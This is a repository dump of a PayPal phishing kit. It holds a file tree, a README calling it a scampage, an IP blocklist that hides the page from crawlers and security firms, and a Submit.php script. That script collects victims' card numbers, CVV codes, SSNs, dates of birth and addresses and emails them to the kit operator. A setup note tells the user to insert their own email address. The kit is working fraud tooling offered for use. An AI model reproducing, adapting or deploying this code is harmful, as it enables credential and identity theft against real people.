├── README.md
├── ____YourMail____.php
├── blocker.php
├── detect.php
├── ganti email di file ___YourMail___.txt
├── index.php
├── myaccount
├── MoreArt
│ ├── Submit.php
│ ├── footer.php
│ ├── header.php
│ ├── home.php
│ ├── index.php
│ ├── lib.php
│ ├── redirscr.php
│ ├── success.php
│ ├── tabel_kiri.php
│ ├── webscr.php
│ └── websrc.php
├── css
│ ├── app.css
│ ├── coreLayout.css
│ ├── eightball.css
│ ├── global.css
│ ├── pageSalsa.css
│ └── summary.css
├── form
│ ├── address_info.php
│ ├── card_info.php
│ ├── info.php
│ ├── ip_info.php
│ └── success.php
├── icon
│ ├── apple-touch-icon.png
│ ├── cv_amex_card.gif
│ ├── cv_card.gif
│ ├── enabled_by_symc_vip.png
│ ├── header_logginginAction.gif
│ ├── icon_alert_24wx24h.gif
│ ├── icon_critalert.gif
│ ├── logo.gif
│ ├── logo2.gif
│ ├── logo_paypal_106x27.png
│ ├── paypal_logo.gif
│ ├── pp_favicon_x.ico
│ ├── sc.png
│ ├── scr_check_10x10.gif
│ ├── scr_x_10x10.gif
│ ├── sprite_header_icons_2x.png
│ ├── sprite_ia.png
│ ├── sprite_nav_icons.png
│ ├── sprite_nav_icons2x.png
│ └── sprites_cc_global.png
├── index.php
├── js
│ ├── global.js
│ ├── jquery.billing.js
│ ├── jquery.min.js
│ ├── jquery.payment.js
│ ├── new.look.js
│ └── pageSalsa.js
├── objects
│ ├── PayPalIcons-Regular.eot
│ ├── PayPalIcons-Regular.ttf
│ ├── PayPalIcons-Regular.woff
│ ├── btn_bg_default.gif
│ ├── btn_bg_sprite.gif
│ ├── btn_bg_submit.gif
│ ├── nav_sprite.gif
│ └── src_ao_bluebg_1x300.gif
├── page
│ └── cvv_info_pop&enable_locale.htm
└── robots.txt
├── robots.txt
└── webapps
├── MoreArt
├── home.php
├── index.php
├── webscr.php
└── websrc.php
├── index.php
└── robots.txt
/README.md:
--------------------------------------------------------------------------------
1 | # scampage
2 | Scampage / Phising Paypal
3 |
--------------------------------------------------------------------------------
/____YourMail____.php:
--------------------------------------------------------------------------------
1 |
4 |
--------------------------------------------------------------------------------
/blocker.php:
--------------------------------------------------------------------------------
1 | 0) {
7 | header("HTTP/1.0 404 Not Found");
8 | die("
404 Not Found
The page that you have requested could not be found.");
9 |
10 | }
11 | }
12 | $bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", "^91.103.66.*", "^208.91.115.*", "^199.30.228.*");
13 | if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
14 | header('HTTP/1.0 404 Not Found');
15 | exit();
16 | } else {
17 | foreach($bannedIP as $ip) {
18 | if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
19 | header('HTTP/1.0 404 Not Found');
20 | die("404 Not Found
The page that you have requested could not be found.");
21 | }
22 | }
23 | }
24 |
25 | ?>
--------------------------------------------------------------------------------
/detect.php:
--------------------------------------------------------------------------------
1 | country_code;
6 | $nama_negara = $details->country;
7 | $kode_negara = strtolower($negara);
8 |
9 | ?>
--------------------------------------------------------------------------------
/ganti email di file ___YourMail___.txt:
--------------------------------------------------------------------------------
1 | ganti email di file ___YourMail___ dengan mail mu
--------------------------------------------------------------------------------
/index.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/myaccount/MoreArt/Submit.php:
--------------------------------------------------------------------------------
1 | brand;
9 | $ccbank = $getbank->bank;
10 | $cctype = $getbank->card_type;
11 | $ccklas = $getbank->card_category;
12 |
13 | //+++++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++++\\
14 | $message ="
15 | ++=======[ $$ Haurgeulis HunterZ $$ ]=======++
16 |
17 | .++=====[ CreditCard ]=====++.
18 | Cardholder Name : ".$_POST['cc_holder']."
19 | Card Number : ".$_POST['cc_number']."
20 | Expiration Date : ".$_POST['expdate_month']." / ".$_POST['expdate_year']."
21 | Cvv2 : ".$_POST['cvv2_number']."
22 | BIN/IIN Info : ".$ccbank." - ".$cctype." - ".$ccklas."
23 | Sort Code : ".$_POST['sort_code1']." - ".$_POST['sort_code2']." - ".$_POST['sort_code3']."
24 | .++=========[ End ]=========++.
25 |
26 | .++===[ Address & Info ]===++.
27 | Address Line 1 : ".$_POST['address1']."
28 | Address Line 2 : ".$_POST['address2']."
29 | City/Town : ".$_POST['city']."
30 | State : ".$_POST['state']."
31 | Zip/PostCode : ".$_POST['postal']."
32 | Country : ".$nama_negara."
33 | Phone Number : ".$_POST['phone']."
34 | SSN : ".$_POST['ssn1']." - ".$_POST['ssn2']." - ".$_POST['ssn3']."
35 | ID Number : ".$_POST['id_number']."
36 | DOB : ".$_POST['dob_day']." / ".$_POST['dob_month']." / ".$_POST['dob_year']."
37 | .++=========[ End ]=========++.
38 |
39 | .++=======[ PC Info ]=======++.
40 | From : ".$ip." On ".date('r')."
41 | Browser : ".$_SERVER['HTTP_USER_AGENT']."
42 | .++=========[ End ]=========++.
43 |
44 | ++=======[ $$ Haurgeulis Money HunterZ $$ ]=======++
45 | ";
46 | //+++++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++++\\
47 |
48 | include('../../____YourMail____.php');
49 | $subject = $ccbrand." ".$cctype." ".$ccklas." (".$nama_negara.")(".$ip.")";
50 | $headers = "From: CC Spam Result ";
51 | mail($emailku, $subject, $message, $headers);
52 |
53 | include('../form/ip_info.php');
54 | $subject = $ccbrand." ".$cctype." ".$ccklas." (".$nama_negara.")(".$ip.")";
55 | $headers = "From: CC Spam Result ";
56 | mail($emailku, $subject, $message, $headers);
57 |
58 | header("LOCATION: redirscr?cmd=_logout&session=".md5(microtime())."&dispatch=".sha1(microtime())."");
59 |
60 | ?>
--------------------------------------------------------------------------------
/myaccount/MoreArt/footer.php:
--------------------------------------------------------------------------------
1 |
15 |
16 |
17 |